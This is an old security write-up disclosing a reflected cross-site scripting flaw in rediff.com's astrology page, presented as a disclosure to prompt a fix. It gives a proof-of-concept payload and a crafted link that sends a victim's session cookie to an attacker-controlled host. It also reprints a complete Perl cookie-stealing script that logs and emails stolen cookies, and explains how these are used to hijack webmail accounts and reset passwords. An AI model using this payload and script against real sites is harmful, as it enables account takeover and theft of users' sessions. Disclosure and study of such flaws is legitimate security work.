Web Hosting by Netfirms | Free Domain Names by Netfirms

Sorry, your browser doesn't support Java.

XSS vulnerability @ rediff.com BY MOHIT JOSHI Warning & Disclaimer The problem described here existed as on date of writing this paper. The author has only analyzed a possible situation by viewing the source code. The author does not take any guarantees that this situation can be exploited or not. In addition to this the author is not responsible for your activities. Nothing I did was illegal but if you break into somebody's account, that is against the law. This document is being published so that the Rediff can take corrective measures and prevent the situation from being exploited. Anatomy of (possible) Attack What is described here is the classical case of XSS (Cross Site Scripting) vulnerability. This paper does not intend to teach you what XSS is as there are numerous papers available online for that purpose. So lets begin by going to the main page of rediff.com (http://in.rediff.com/index.html) which generally looks like this. Now, if you view the source code of this page in your favourite browser you'll find the following javascript embedded in it. <SCRIPT language="JavaScript" type="text/javascript"> signname = new Array ('Aquarius','Pisces','Aries','Taurus','Gemini','Cancer','Leo','Virgo','Libra','Scorpio','Sagittarius','Capricorn'); function showdaily() { sign = document.pred.sign.options[document.pred.sign.selectedIndex].value; var wind=window.open("http://astrology.rediff.com/sections/daily/daily.asp?sign="+sign,"RediffDaily","toolbars=no,directory=no,scrolling=no,scrollbars=yes,maximize=null,width=520,height=423"); } function openscore(fileName) { window.open(fileName,"scorepop","top=2,left=2,toolbars=no,maximize=no,resize=no,width=385,height=380,location=no,directories=no,scrollbars=no"); } function PasswdRemindWin() { window.open("http://login.rediff.com/cgi-bin/passwd_remind.cgi?FormName=showlogin","win1","toolbar=no,directories=no,resize=yes,menubar=no,location=no,scrollbars=yes,width=490,height=480,maximize=null,top=70,left=80"); } </SCRIPT> What is of interest to us is the function showdaily. Observe carefully what happens here when this function is executed. Depending on the user input (which is by normally by clicking on a link on the browser screen) one the values of the sun sign is assigned to the variable sign. On recieving this value, a new window pops up. The URL provided to this new window is the following: http://astrology.rediff.com/sections/daily/daily.asp?sign="+sign The new window that opens up typically looks like this: So as you can see that the new window details the fortunes of cancer sign ironically messing up its own. Now I'll show you how. The problem here is actually the most common one - improper input string validation. The people who coded this have assumed that user will always enter one of the sun sign value because they also assumed that user will only follow links on the browser. Thus they did not feel the need to filter the data sent by the user. This is ofcourse not true. If you observe the above screenshot carefully, you'll see that the name on sun sign appears in the window ("Dear, cancer"). From this we infer that user can send arbitrary sign value and it will be printed. Also since no filtering of this data is provided it possible to pass malicious data too. An example is shown below: http://astrology.rediff.com/sections/daily/daily.asp?sign= <script>alert(document.cookie)</script> There are many possible variants of the above URL. What it basically does, is to embed the script tag in our astrology page. When this script is executed, it displays the user cookie. Nothing more need to be said to those who know how to exploit XSS. For the rest of you this is how it is done. The aim is to steal the user cookie. Now consider a user who is viewing his mail at rediff. If the attacker can steal user's active cookie then he can access the user's mailbox and even reset the password. This is accomplished by sending the user a mail that contains a following link. <a href="http://astrology.rediff.com/sections/daily/daily.asp?sign=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>">This will steal your cookie</a> The attacker.com is the website owned by attacker where he places a script which records the value of this cookie. The attacker then uses this cookie value to access the user's mailbox. One such script is shown below. It has been borrowed from an excellent paper by "David Endler" titled "The Evolution ofCross-Site Scripting Attacks" and I would suggest that you read this if you are not aware of XSS attacks ( and this entire paper has gone over your head ). Also this paper gives details of how to automate such an attack. Here is the script: #!/usr/bin/perl # steal.cgi by David Endler dendler@idefense.com # Specific to your system $mailprog = '/usr/sbin/sendmail'; # create a log file of cookies, we’ll also email them too open(COOKIES,”>>stolen_cookie_file”); # what the victim sees, customize as needed print "Content-type:text/html\n\n"; print <<EndOfHTML; <html><head><title>Cookie Stealing</title></head> <body> Your Cookie has been stolen. Thank you. </body></html> EndOfHTML # The QUERY_STRING environment variable should be filled with # the cookie text after steal.cgi: # http://www.attacker.com/steal.cgi?XXXXX print COOKIES “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”; # now email the alert as well so we can start to hijack open(MAIL,"|$mailprog -t"); print MAIL "To: attacker\@attacker.com\n"; print MAIL "From: cookie_steal\@attacker.com\n"; print MAIL "Subject: Stolen Cookie Submission\n\n"; print MAIL "-" x 75 . "\n\n"; print MAIL “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”; close (MAIL); This script also alerts the attacker by sending him an e-mail everytime a cookie is stolen. There are numerous ways of carrying out this kind of XSS attacks. What this paper has shown is the possibility of such an attack on rediff. I hope this information will be used properly and not to cause any damage. MOHIT JOSHI e-mail: mohitDOTjoshiDOTmjATgmailDOTcom